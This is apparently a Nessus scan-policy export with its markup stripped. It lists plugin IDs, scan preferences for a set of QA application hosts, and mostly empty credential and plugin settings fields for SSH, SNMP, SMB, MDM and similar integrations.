55140;27479;66925;52342;50396;38501;45702;29461;42793;35520;27518;26272;61648;48370;46682;38742;42599;66435;38093;45774;52931;36499;26981;23114;65296;66097;38100;39300;42987;19743;58844;52041;36471;47267;54374;31825;16302;13368;15076;26325;30567;14660;63608;40979;35241;56926;37298;26319;14962;49990;55063;46843;50538;10851;12302;26764;51823;32117;36636;36725;41722;42438;26033;10883;18144;45348;35701;37209;33207;25987;17211;39372;50728;29447;19936;50973;22830;44342;57208;36809;28142;23501;31794;22325;19533;33448;27102;16782;18982;59274;43745;57227;48387;63532;46364;39243;49520;57530;42512;37195;59019;41179;34595;60710;54312;59321;15009;30635;12422;13574;19958;16880;49508;14854;11333;41171;65139;54032;60688;20822;48450;25001;62759;42996;64299;60495;17988;52460;51691;59649;27456;30558;59840;11177;56768;21201;55417;54789;10200;20980;26975;47103;44550;42907;47848;46982;60856;25403;15459;65582;24844;29259;62441;24622;48301;29055;29920;48177;40508;48859;18972;20934;21344;25844;22056;35731;32403;45981;55584;65295;39548;44405;44182;31232;66375;64922;48733;34643;28602;12538;51625;29769;43804;55987;25251;50584;48204;26232;56134;45555;66014;39721;32157;62577;38982;52798;20349;14649;53095;61235;37332;56848;17040;61266;65554;62454;58417;23882;41151;19088;11713;50407;60204;54529;41736;24485;27359;47294;59928;14490;28052;16193;51080;31390;19665;14748;50494;58174;66797;24873;42563;61831;36768;39109;39796;30587;40894;32700;18108;18862;32415;17359;28864;32151;21712;12033;64570;33586;40224;40613;58363;50878;26655;62857;14607;51455;65542;58931;20474;66576;38390;27532;36717;11693;40222;33164;49548;18780;23252;22228;15147;12459;51425;56368;37726;28139;43714;20239;59748;57929;45849;65712;25227;23920;53818;38151;39126;50977;33057;14021;37654;55017;21323;58789;46481;24939;48770;36389;50511;44016;29360;61457;23886;44428;12013;11380;51608;25913;53383;47776;48235;17352;54030;66641;20170;41947;18203;58340;54179;30923;48726;58804;16019;25038;28281;14641;64058;57104;12827;66907;60809;41552;25099;21567;37386;65116;15772;41350;23048;66477;59004;59253;45797;53042;60910;18039;49407;62772;37357;42154;42539;11276;21825;30273;11669;30295;27695;38355;13674;24875;21366;49415;63177;33654;46278;47242;39483;57009;33719;17823;21849;63333;18872;31578;21185;65946;14099;48228;39242;37562;35953;47392;17007;53601;51850;32248;20708;53984;24290;64720;17241;18313;57545;39646;30796;15631;38305;62479;26486;17987;29216;36943;45197;28085;56336;38130;28773;39637;21960;16474;30622;34933;41637;51613;37295;47096;13200;31152;39619;38772;17709;47391;63758;52511;64152;55813;36532;66536;12637;46211;52103;22369;55577;38620;32259;39239;24135;63410;21600;49629;44707;27198;27434;12517;10698;29763;45613;29806;11038;45195;54863;32159;10699;66972;58351;27182;25303;45805;27620;57202;37513;39994;24983;30995;33566;59405;54562;47167;66036;61907;36204;20101;25781;17704;25132;41840;49026;43281;40670;43299;33340;23108;16677;15985;31718;57810;44816;49050;22244;20638;43525;22422;43689;18232;11496;54948;35588;64875;36961;16693;63491;30464;47757;33174;60671;40571;55229;22932;14960;24929;58625;19950;37016;32171;19486;33553;47822;36607;42004;52599;23464;41307;59894;50995;32563;33404;23157;17679;58727;14044;26482;28448;22600;46837;12836;56945;64483;17307;35772;20508;35400;31695;46339;64848;56312;37269;59173;34743;31221;66860;61198;60099;58127;10533;58774;27166;38952;33519;20717;41811;61069;15889;28191;44465;36741;60281;20116;30410;58635;35206;24108;58074;59945;18069;51454;31343;45967;46911;44458;66331;54342;36701;64707;28244;58671;32988;41844;36938;65711;19796;46773;57105;29394;65813;26759;39407;55465;13528;63584;31875;32289;12288;59316;64100;26731;16099;44078;26963;13774;34849;41385;31211;63478;21152;48614;22774;22708;54691;44783;28648;56007;53145;13651;33307;11262;48221;42458;43925;24744;46473;16535;17447;19870;63272;37050;38526;19065;54066;37567;15578;52964;35980;47487;40162;40899;26406;22473;46609;63954;64330;63189;44255;53243;51841;42349;58676;65163;56216;22330;42329;63403;12212;42102;11926;38823;26077;40304;59706;42840;54604;45999;23232;30899;56195;12317;66045;44288;33939;42850;10460;37794;26285;57162;52493;45810;61273;30903;63825;14581;10865;43385;43147;50218;49842;39233;41493;60928;37076;29500;28876;64074;61096;52425;18000;10394;40607;55302;32244;60190;27070;63915;34434;60574;17397;19378;61427;50645;18089;58598;46071;53911;57893;43170;60691;22977;36857;35233;60429;34645;52421;15928;46082;17058;50523;20337;36063;62505;45637;13031;19657;37479;57072;25497;52915;16983;65526;18571;45355;19725;14471;34051;44759;47473;35061;20230;19713;65869;53902;42057;44480;11223;55479;42023;43567;38045;10078;52571;45313;47753;20735;20520;14349;35452;46509;15485;66815;45096;21932;31585;50399;50949;47275;37395;34623;26956;11129;57120;62379;59434;26442;57037;32665;59930;33887;42393;26263;12613;16865;24516;12012;14522;56462;25936;24453;47716;66953;51494;20777;16795;28456;15220;48504;33223;45527;42363;55695;44617;63419;61300;26570;54308;50224;21452;50775;22043;42955;19391;57697;33840;25181;24583;22370;16920;23851;60884;32073;40797;36538;44335;22760;57228;14872;64669;44705;51023;58885;63126;11761;63598;21996;29095;28525;20436;22993;42259;32205;41887;58019;26730;56895;13837;11490;19227;26937;28807;33834;21068;56732;55966;12882;35050;47340;32535;38536;40904;15190;45976;39696;21581;41834;30086;31804;65309;62777;20145;29184;37832;66173;30582;60075;12937;28023;62083;49266;13007;10028;21040;29989;39278;13620;11391;63363;56235;11218;57968;12084;51147;26536;47682;14006;51552;52724;25467;31422;31926;63458;13330;32627;41503;37547;19429;58886;66156;20487;62872;13955;20533;48880;57185;15249;29922;65562;14291;19023;21837;65168;24465;43678;59485;22097;13645;45865;17431;33493;30475;24125;59038;30844;38170;41065;14593;33673;59718;48230;11898;11755;64696;30023;29514;19319;50791;35707;48163;40043;60565;29000;26856;48407;31984;40615;34696;48561;62738;65365;43510;24776;63396;50526;62649;13833;43706;42511;16301;46800;32611;40774;63883;59063;15005;29439;19798;23292;25914;17383;43053;58554;16872;39527;54134;46575;38994;61784;37406;48612;34788;22098;30463;63057;11893;15008;58969;15046;37398;20126;35228;10786;20413;45563;50833;45315;26715;23360;53456;17365;66233;12319;59480;43926;43894;66368;37914;44803;32497;28078;27158;26165;33462;49397;59491;24619;27063;11489;51610;43379;30493;25848;18994;66348;13815;65005;62149;11429;48965;42639;19489;55462;26873;30698;18478;39882;64978;59361;26115;43245;28762;48616;20452;34656;45433;44643;43368;64396;19348;54483;44017;45309;58739;32502;36687;48660;62724;23747;19916;12692;16040;25134;39839;48692;33029;51511;17804;47087;36056;27509;22974;54556;13680;23765;38625;42292;52693;48220;37833;31909;29189;49886;50307;20396;53186;56011;35609;34501;31447;12243;49511;21765;38409;28898;62420;58818;23834;53977;25076;49042;15746;30966;27310;18415;18949;61261;38188;11357;23475;17820;30432;19314;42861;57942;50481;49755;64730;29416;29431;21668;17514;13657;41582;46100;64826;50096;41942;24853;43521;52575;27427;66874;59075;15446;45769;12351;29162;36085;38966;61008;45664;58866;33764;63526;14595;35983;41608;43269;31361;54307;17010;30560;42752;15240;30233;17287;41995;66608;33347;22346;46816;25342;37329;57362;28775;43489;21162;34254;23679;38544;36239;13820;51969;66919;20443;43462;64462;65243;59581;60993;18963;49176;44169;39022;29116;61012;54319;26313;19965;37408;48400;34950;23150;58741;29554;10447;66159;56722;63946;63517;31324;36108;40213;27057;12092;48361;50844;40087;55973;20392;40086;43022;30841;18751;57523;44988;13604;16592;55428;27110;57343;46422;60867;23617;59749;55795;44495;37422;45089;58768;18049;59311;29194;40387;28797;16997;23064;47403;65456;57649;14392;46515;26135;57289;63867;46989;46349;35943;27815;23889;56755;26251;55720;50118;54780;56629;39732;26174;40031;47309;58550;17030;26732;55035;66374;34535;46784;52158;46070;47279;44908;61422;36172;59385;11637;25978;62539;51612;13637;66639;52732;43439;14730;52682;34758;49202;27574;35019;66249;44497;31703;57326;34612;13981;28759;31209;15045;42780;41744;30408;39329;50295;14699;32850;44386;19203;57804;25437;42499;58531;31091;39973;45379;39494;53142;20011;49117;26553;36080;27332;28667;11698;32025;33243;60368;20917;54956;55690;21384;37666;20025;19745;51135;55697;34957;10523;46323;55230;47658;53862;40478;47874;40067;10585;11074;26581;39536;10048;29779;29601;10574;26949;58938;47143;22021;61673;10553;35703;25968;41261;51562;36537;45743;60887;36985;32077;32694;29856;37544;66782;14535;10850;60223;44443;28861;31138;11005;52340;56295;22581;64379;28551;43018;29613;39571;41263;50956;46139;51946;29873;65049;46691;52065;29135;39082;23373;31586;30373;44095;49301;31416;20781;20416;14615;42989;50510;33115;26577;62528;37843;24385;48478;54362;65035;60465;27242;36992;44128;57138;39244;49456;59235;54826;63739;28204;66479;66269;19835;26002;57679;31398;54092;51457;17012;39905;30987;15399;26350;19784;66065;18293;35606;27412;30015;15320;32443;20218;29714;50461;50492;16875;47845;61128;39150;43148;38988;22493;21883;50843;49854;66328;39451;55970;20881;42124;20530;59662;11235;17000;61340;37543;11812;22522;27569;19373;27248;62405;19544;36173;61211;47869;16197;60446;45530;56883;57351;33018;38777;37219;55080;36779;57891;32488;41937;26410;43788;19502;17972;30820;25640;65020;24541;57428;49329;22862;43557;29859;46452;18088;16249;43625;60405;44065;46582;42447;59301;23769;62670;21641;51624;18338;51362;42348;19242;46881;26464;43195;50484;16138;66952;11514;18325;28337;60524;54931;27003;30677;22991;27977;15424;43634;53043;25652;60210;47284;57163;22209;37937;28995;65400;66836;61165;64142;41393;33467;21914;15526;24501;46597;19137;28451;45882;53078;45757;45690;25759;28965;62813;58952;13371;58131;65361;33295;14506;53465;30948;29327;58009;63769;36307;24005;15105;16334;61124;62241;49709;15696;27190;37315;10063;26817;24010;19392;39868;45460;16434;40968;64011;39767;62282;61894;19516;35484;41186;35086;52454;46137;51402;36276;35246;32924;35925;33483;58099;51916;20032;51501;41120;45939;35909;58485;10301;26697;43108;22452;42786;56431;53719;66684;15206;61240;61954;57682;14294;14160;35429;26229;30054;59698;48894;61135;39749;49067;22014;50029;60820;61562;48565;47049;10179;10477;32452;56101;45247;28467;65326;63110;28646;60580;45510;37771;32161;65222;60848;52020;22339;36515;27147;34690;10303;65330;16219;62337;63020;46361;31445;46080;38073;66371;66204;54663;19579;16979;55572;54117;23404;65297;12768;31073;55078;59826;44749;62108;15366;34512;62639;26316;21329;56916;13127;14161;47305;52905;58594;15903;13900;21859;54919;46811;46967;42557;25297;32192;43161;48296;54978;57233;28376;21884;58106;45917;29313;34946;60423;16170;19589;45983;46119;59908;50106;47613;12678;56176;43190;60698;32435;43429;17279;38735;62521;10205;64064;15495;14543;41866;12233;41905;61711;36425;43227;15886;54037;33620;16491;51643;38826;58356;16096;28214;40566;18734;53150;26074;19941;63921;21012;47604;60259;32472;15521;64265;60388;21650;34523;57349;46427;34881;16469;31758;35378;34626;37740;30453;37253;14198;42312;24751;20220;44023;37052;56524;56164;55723;18606;28817;51339;23370;23238;52035;12857;27809;20946;65636;47802;18901;46494;39093;12030;48785;43651;23095;13102;57287;62967;23670;41477;13773;61658;63528;44879;36008;65541;14240;30365;36267;37992;50187;13186;55989;19304;28868;58169;12371;60516;30990;10645;51208;65466;56907;50838;53533;32465;16331;10986;65394;38563;33239;23529;25184;41390;62802;39262;64777;61098;42410;18475;27730;31310;42022;61589;16144;46505;47093;28196;59068;47368;53839;25200;59136;45483;43888;16451;38971;16372;10393;44404;38576;58495;51545;13394;37933;61151;64703;65715;13211;51312;25186;47446;32957;22152;34402;32420;23878;62056;23498;59188;65126;62752;17648;60156;62423;39131;49593;33790;35621;57224;27096;51324;59568;38597;42668;55906;18731;12376;44521;19629;14340;38287;63854;61035;29752;13385;24458;27408;11679;34948;51834;36040;56260;44111;50433;35887;65344;32272;57718;31772;40975;64591;16282;34582;22169;10029;63781;45329;26522;25727;19031;12201;37546;36720;30418;18910;44964;61734;22494;58082;43479;40992;30678;65009;47598;54241;26866;40665;16004;19318;18675;54318;15684;15453;38956;18495;58020;46350;41268;64585;30524;57743;62242;17145;23149;22573;30265;34614;19938;30916;14630;37175;22245;59744;34493;16560;16140;15291;31032;30443;65118;16540;18938;52637;11143;52947;57802;63622;21441;57874;47039;28641;42085;36160;11740;48988;49006;31799;63442;13335;66194;16702;23590;25806;13613;35942;25637;30975;56061;27783;13982;63590;48490;47879;28664;22739;48360;37982;33577;50922;41814;30421;56315;51175;31316;10815;58181;40496;41610;25907;19267;44616;36893;22246;56522;16058;20010;65453;36126;15311;24377;32942;35211;18964;37488;10881;14213;18035;14112;45356;10734;44106;65370;33070;60832;14249;39977;45561;18898;53056;64610;14408;19660;56753;45464;40187;47475;59031;11053;35540;31524;15030;18986;24475;28848;38953;23338;15781;43838;27517;66922;33745;44212;24132;60699;32597;39688;53399;64109;27290;58271;22893;59685;26038;49189;62616;49858;10922;19285;38353;56734;58571;62398;56547;28791;34709;13556;44191;39690;31402;47380;24110;46782;30326;24358;41113;31633;62711;20072;42373;12769;17420;29549;54548;23359;45821;62990;38676;59460;10988;60284;17833;19600;25003;54106;65452;54076;53321;58210;64965;62464;63007;21603;25933;10968;20140;23369;32998;11205;22002;55535;16931;44190;42487;33155;36369;44273;32592;14365;21818;62485;50082;35513;54757;46877;40010;11684;26708;42318;41560;33280;38118;43977;61203;52417;62475;12381;30955;63891;52881;15710;41296;49595;66020;22261;20176;59247;16723;16410;15937;51275;52406;60415;29344;26793;28280;61491;21243;30152;58228;33761;60411;51451;24026;16640;16181;54952;48330;57299;25811;25823;29981;31485;65060;23004;44261;51744;40122;10366;33696;37436;62463;63024;10939;15337;11598;20078;37156;26563;28833;56898;21533;23336;14329;51011;60941;57859;49358;43897;26972;64795;57903;54649;33342;51882;49933;21573;28601;47608;16202;10112;19468;55019;38890;55975;35168;31768;56346;53873;64545;43235;63800;59089;13724;12710;11344;12914;42692;58811;46938;61939;44652;20558;19360;53233;63831;35198;65926;50442;39116;32777;14857;58499;49076;63818;58607;51589;37114;24922;50480;54583;27494;50984;10783;43397;66656;58073;54301;40485;65978;64496;43719;31288;41176;50293;61351;24361;12073;33952;12099;25999;63774;49827;10407;39719;53189;40925;26284;15771;60412;56851;54226;61476;37234;54738;21338;28484;47075;46455;54304;53668;59978;63302;32187;55722;64936;56565;34400;12907;45133;14178;13050;43326;63827;64840;34251;60812;32589;10605;49513;45631;65566;13273;26126;65404;31299;51560;49380;39880;27637;50490;55836;56773;46565;49708;56450;55136;23056;20774;19012;56896;32811;60322;26181;61344;55711;25381;25557;59722;46053;16437;29229;14904;63076;30775;38867;14045;27342;24279;39255;52230;66785;42414;16304;44801;16188;59951;30042;51830;49951;41357;59388;63562;41229;66969;50972;38158;51689;50624;60088;35904;33703;63614;33178;16159;25580;64317;31180;64034;37673;24713;22207;22574;32654;56839;57500;29039;56588;25376;48280;31208;63750;43360;46886;17205;49538;14537;32940;44457;46157;37896;33221;63556;30038;49306;50226;20161;12666;30394;23178;60497;64112;53544;43278;58958;40064;26535;50902;22347;57382;13808;60766;40370;39117;62778;45611;20453;28346;60589;58400;21543;17528;66791;57171;65408;56641;36079;47246;19892;50904;16242;27395;59446;62445;31961;26903;18453;16594;21772;40727;35951;61578;22437;46998;62478;40891;26040;42621;20827;13400;22627;35730;41088;10093;11407;63570;30599;30772;61889;36162;28252;57194;30517;31793;55057;46747;65858;25062;62655;28380;12262;50746;52415;10276;60649;60063;14070;22455;20440;45231;53810;34469;59403;51738;54034;38712;13890;66828;51708;51491;45437;36065;28133;55236;19423;20991;22927;45603;16128;35978;57913;27600;17694;40996;66329;40079;45266;21551;28779;45607;62401;36015;31946;18322;45367;24790;47617;45720;65609;40599;12567;16275;15743;44948;12587;19962;17342;54846;31384;11284;36606;56166;33456;59427;20587;57907;50267;37302;41206;53724;14268;26009;49760;64236;16010;45336;33504;40211;15934;41330;16533;28285;26585;25067;41755;29443;56652;47799;16390;14222;46721;46196;36082;20033;28130;23854;29835;28998;11799;34293;64747;50148;43798;24510;28152;56906;44649;27483;36509;59250;41143;47455;30588;30523;25089;35327;12773;60811;20235;29684;25662;61446;20940;32229;55152;25367;65844;19022;12780;18060;54059;51934;64146;24702;53915;57094;36851;30461;27808;13740;63958;18888;43136;41611;54197;34481;46391;31247;39819;61611;16569;40988;15656;32663;38168;16051;43639;60062;62541;36501;38490;46522;33813;40375;14673;11989;23058;59243;56190;32868;46298;16549;21480;46605;20037;63365;49023;34341;51799;33902;21171;50552;13053;59975;39167;24722;26724;20375;24895;52144;29865;23852;53245;38253;28576;41421;65050;44781;17219;17654;52959;21464;13169;19780;22523;13002;50183;13134;20685;11420;15915;18400;32300;12391;25918;10182;32082;13191;61020;50566;19082;13887;63972;41770;52004;13483;30896;48268;30045;49962;28950;40844;48913;21387;44503;15636;33534;31198;31005;54416;44131;53916;22817;64448;44868;54055;47388;65431;18145;13928;29628;39862;24905;16163;27568;47472;60974;39969;62902;54471;64633;39264;65593;64272;60920;66525;12500;16806;65599;21816;49421;61234;56912;24596;32238;10588;20148;55207;17054;27767;44429;31179;16199;58596;35328;44112;11804;12472;13067;24347;24864;63716;24946;47600;65794;17436;40232;12602;29163;57989;19747;66917;65089;46960;50680;46285;28531;23850;31428;28117;21257;31355;22170;56998;53517;31935;57367;10153;65495;34712;22711;20306;27979;37617;64992;54739;45905;34883;26376;29006;65029;38720;14877;23749;15894;61459;54680;26566;33809;49823;20089;31345;59278;16947;34217;42543;66059;66289;49193;21674;42584;52402;62126;19943;14010;35157;32914;20970;48199;48948;65952;56696;26197;56684;62023;65835;22750;32042;14177;40531;62222;50327;10505;40065;37801;27225;25410;56512;56771;56224;32896;32261;24888;61201;52826;19702;34929;35946;46083;27181;28391;46313;12792;13119;54493;45346;54278;42513;48996;32953;35381;64716;38385;62527;34419;61194;32732;34072;10938;65987;49089;53896;43011;10837;55329;17042;57191;53199;60959;54315; + +TARGET +QA3app01,QA3app02,QA3app03,QA3app04,QA3app05,QA3app06,QA3app09 + +throttle_scan +yes + +listen_address +0.0.0.0 + +non_simult_ports +139, 445, 3389 + +slice_network_addresses +no + +max_checks +5 + +stop_scan_on_disconnect +no + +host.max_simult_tcp_sessions +unlimited + +report_crashes +yes + +xmlrpc_listen_port +8834 + +whoami +famato + +audit_trail +no + +policy_uuid +AF5EFE99-A40A-4E27-89B4-1E86E4953852 + +reverse_lookup +no + +optimize_test +yes + +log_whole_attack +no + +ssl_cipher_list +strong + +cgi_path +/cgi-bin:/scripts + +unscanned_closed +no + +save_knowledge_base +no + +xmlrpc_no_referrer_check +yes + +use_kernel_congestion_detection +no + +listen_port +1241 + +auto_update +yes + +checks_read_timeout +5 + +plugins_timeout +320 + +auto_enable_dependencies +yes + +safe_checks +yes + +report_task_id +7c0d6bc0-4435-4b08-50d7-30559fc1d6457227e538e257e575 + +allow_post_scan_editing +yes + +stop_scan_on_hang +no + +max_hosts +80 + +plugin_upload +yes + +reduce_connections_on_congestion +no + +feed_type +HomeFeed + +silent_dependencies +yes + +port_range +default + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[file]:File containing machine readable results : +File containing machine readable results : +file + + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[radio]:Mode +Mode +radio +Map applications;Just grab banners;Port scan only +Map applications;Just grab banners;Port scan only + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[checkbox]:Quicker +Quicker +checkbox +no +no + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[checkbox]:UDP scan (disabled in safe_checks) +UDP scan (disabled in safe_checks) +checkbox +no +no + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[checkbox]:SSL (disabled in safe_checks) +SSL (disabled in safe_checks) +checkbox +yes +yes + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[checkbox]:RPC (disabled in safe_checks) +RPC (disabled in safe_checks) +checkbox +yes +yes + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[entry]:Parallel tasks +Parallel tasks +entry + + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[entry]:Connection retries +Connection retries +entry + + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[entry]:Connection timeout +Connection timeout +entry + + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[entry]:Read timeout +Read timeout +entry + + + +SNMP settings +19762 +SNMP settings[entry]:Community name : +Community name : +entry +public +public + +SNMP settings +19762 +SNMP settings[entry]:Community name (1) : +Community name (1) : +entry + + + +SNMP settings +19762 +SNMP settings[entry]:Community name (2) : +Community name (2) : +entry + + + +SNMP settings +19762 +SNMP settings[entry]:Community name (3) : +Community name (3) : +entry + + + +SNMP settings +19762 +SNMP settings[entry]:UDP port : +UDP port : +entry +161 +161 + +SNMP settings +19762 +SNMP settings[entry]:SNMPv3 user name : +SNMPv3 user name : +entry + + + +SNMP settings +19762 +SNMP settings[password]:SNMPv3 authentication password : +SNMPv3 authentication password : +password + + + +SNMP settings +19762 +SNMP settings[radio]:SNMPv3 authentication algorithm : +SNMPv3 authentication algorithm : +radio +MD5;SHA1 +MD5;SHA1 + +SNMP settings +19762 +SNMP settings[password]:SNMPv3 privacy password : +SNMPv3 privacy password : +password + + + +SNMP settings +19762 +SNMP settings[radio]:SNMPv3 privacy algorithm : +SNMPv3 privacy algorithm : +radio +DES +DES + +Good MDM Settings +66963 +Good MDM Settings[entry]:GMC Server : +GMC Server : +entry + + + +Good MDM Settings +66963 +Good MDM Settings[entry]:Port : +Port : +entry + + + +Good MDM Settings +66963 +Good MDM Settings[entry]:Domain : +Domain : +entry + + + +Good MDM Settings +66963 +Good MDM Settings[entry]:Username : +Username : +entry + + + +Good MDM Settings +66963 +Good MDM Settings[password]:Password : +Password : +password + + + +Good MDM Settings +66963 +Good MDM Settings[checkbox]:SSL : +SSL : +checkbox +yes +yes + +Good MDM Settings +66963 +Good MDM Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +SSH settings +14273 +SSH settings[entry]:SSH user name : +SSH user name : +entry +root +root + +SSH settings +14273 +SSH settings[password]:SSH password (unsafe!) : +SSH password (unsafe!) : +password + + + +SSH settings +14273 +SSH settings[file]:SSH public key to use : +SSH public key to use : +file + + + +SSH settings +14273 +SSH settings[file]:SSH private key to use : +SSH private key to use : +file + + + +SSH settings +14273 +SSH settings[password]:Passphrase for SSH key : +Passphrase for SSH key : +password + + + +SSH settings +14273 +SSH settings[radio]:Elevate privileges with : +Elevate privileges with : +radio +Nothing;sudo;su;su+sudo;dzdo;pbrun;Cisco 'enable' +Nothing;sudo;su;su+sudo;Cisco 'enable' + +SSH settings +14273 +SSH settings[entry]:Privilege elevation binary path (directory) : +Privilege elevation binary path (directory) : +entry + + + +SSH settings +14273 +SSH settings[entry]:su login : +su login : +entry + + + +SSH settings +14273 +SSH settings[entry]:Escalation account : +Escalation account : +entry +root +root + +SSH settings +14273 +SSH settings[password]:Escalation password : +Escalation password : +password + + + +SSH settings +14273 +SSH settings[file]:SSH known_hosts file : +SSH known_hosts file : +file + + + +SSH settings +14273 +SSH settings[entry]:Preferred SSH port : +Preferred SSH port : +entry +22 +22 + +SSH settings +14273 +SSH settings[entry]:Client version : +Client version : +entry +OpenSSH_5.0 +OpenSSH_5.0 + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (1) : +Additional SSH user name (1) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (1) : +Additional SSH password (1) : +password + + + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (2) : +Additional SSH user name (2) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (2) : +Additional SSH password (2) : +password + + + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (3) : +Additional SSH user name (3) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (3) : +Additional SSH password (3) : +password + + + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (4) : +Additional SSH user name (4) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (4) : +Additional SSH password (4) : +password + + + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (5) : +Additional SSH user name (5) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (5) : +Additional SSH password (5) : +password + + + +Hydra: LDAP +15877 +Hydra: LDAP[entry]:DN : +DN : +entry + + + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[entry]:Apple Profile Manager server : +Apple Profile Manager server : +entry + + + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[entry]:Apple Profile Manager port : +Apple Profile Manager port : +entry +443 +443 + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[entry]:Apple Profile Manager username : +Apple Profile Manager username : +entry + + + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[password]:Apple Profile Manager password : +Apple Profile Manager password : +password + + + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[checkbox]:SSL : +SSL : +checkbox +yes +yes + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[checkbox]:Force Device Updates : +Force Device Updates : +checkbox +yes +yes + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[entry]:Device Update Timeout (Minutes) : +Device Update Timeout (Minutes) : +entry +5 +5 + +Remote web server screenshot +59861 +Remote web server screenshot[checkbox]:Allow Nessus to connect to the cloud to take a screenshot of the public targets +Allow Nessus to connect to the cloud to take a screenshot of the public targets +checkbox +no +no + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite server(s) [separated w/ semicolons] : +Red Hat Satellite server(s) [separated w/ semicolons] : +entry + + + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite port(s) : +Red Hat Satellite port(s) : +entry +443 +443 + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[checkbox]:Verify SSL certificates : +Verify SSL certificates : +checkbox +no +no + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite username(s) : +Red Hat Satellite username(s) : +entry + + + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[password]:Red Hat Satellite password(s) : +Red Hat Satellite password(s) : +password + + + +Hydra: HTTP +15873 +Hydra: HTTP[entry]:Web page : +Web page : +entry + + + +SMB Scope +10917 +SMB Scope[checkbox]:Request information about the domain +Request information about the domain +checkbox +yes +yes + +VMware SOAP API Settings +57395 +VMware SOAP API Settings[entry]:VMware user name : +VMware user name : +entry + + + +VMware SOAP API Settings +57395 +VMware SOAP API Settings[password]:VMware password : +VMware password : +password + + + +VMware SOAP API Settings +57395 +VMware SOAP API Settings[checkbox]:Ignore SSL Certificate : +Ignore SSL Certificate : +checkbox +no +no + +Login configurations +10870 +Login configurations[entry]:HTTP account : +HTTP account : +entry + + + +Login configurations +10870 +Login configurations[password]:HTTP password (sent in clear) : +HTTP password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:NNTP account : +NNTP account : +entry + + + +Login configurations +10870 +Login configurations[password]:NNTP password (sent in clear) : +NNTP password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:FTP account : +FTP account : +entry +anonymous +anonymous + +Login configurations +10870 +Login configurations[password]:FTP password (sent in clear) : +FTP password (sent in clear) : +password +nessus@nessus.org +********* + +Login configurations +10870 +Login configurations[entry]:FTP writeable directory : +FTP writeable directory : +entry +/incoming +/incoming + +Login configurations +10870 +Login configurations[entry]:POP2 account : +POP2 account : +entry + + + +Login configurations +10870 +Login configurations[password]:POP2 password (sent in clear) : +POP2 password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:POP3 account : +POP3 account : +entry + + + +Login configurations +10870 +Login configurations[password]:POP3 password (sent in clear) : +POP3 password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:IMAP account : +IMAP account : +entry + + + +Login configurations +10870 +Login configurations[password]:IMAP password (sent in clear) : +IMAP password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:SMB account : +SMB account : +entry + + + +Login configurations +10870 +Login configurations[password]:SMB password : +SMB password : +password + + + +Login configurations +10870 +Login configurations[entry]:SMB domain (optional) : +SMB domain (optional) : +entry + + + +Login configurations +10870 +Login configurations[radio]:SMB password type : +SMB password type : +radio +Password;LM Hash;NTLM Hash +Password + +Login configurations +10870 +Login configurations[entry]:Additional SMB account (1) : +Additional SMB account (1) : +entry + + + +Login configurations +10870 +Login configurations[password]:Additional SMB password (1) : +Additional SMB password (1) : +password + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB domain (optional) (1) : +Additional SMB domain (optional) (1) : +entry + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB account (2) : +Additional SMB account (2) : +entry + + + +Login configurations +10870 +Login configurations[password]:Additional SMB password (2) : +Additional SMB password (2) : +password + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB domain (optional) (2) : +Additional SMB domain (optional) (2) : +entry + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB account (3) : +Additional SMB account (3) : +entry + + + +Login configurations +10870 +Login configurations[password]:Additional SMB password (3) : +Additional SMB password (3) : +password + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB domain (optional) (3) : +Additional SMB domain (optional) (3) : +entry + + + +Login configurations +10870 +Login configurations[checkbox]:Never send SMB credentials in clear text +Never send SMB credentials in clear text +checkbox +yes +yes + +Login configurations +10870 +Login configurations[checkbox]:Only use NTLMv2 +Only use NTLMv2 +checkbox +no +no + +Login configurations +10870 +Login configurations[checkbox]:Only use Kerberos authentication for SMB +Only use Kerberos authentication for SMB +checkbox +no +no + +SMB Registry : Start the Registry Service during the scan 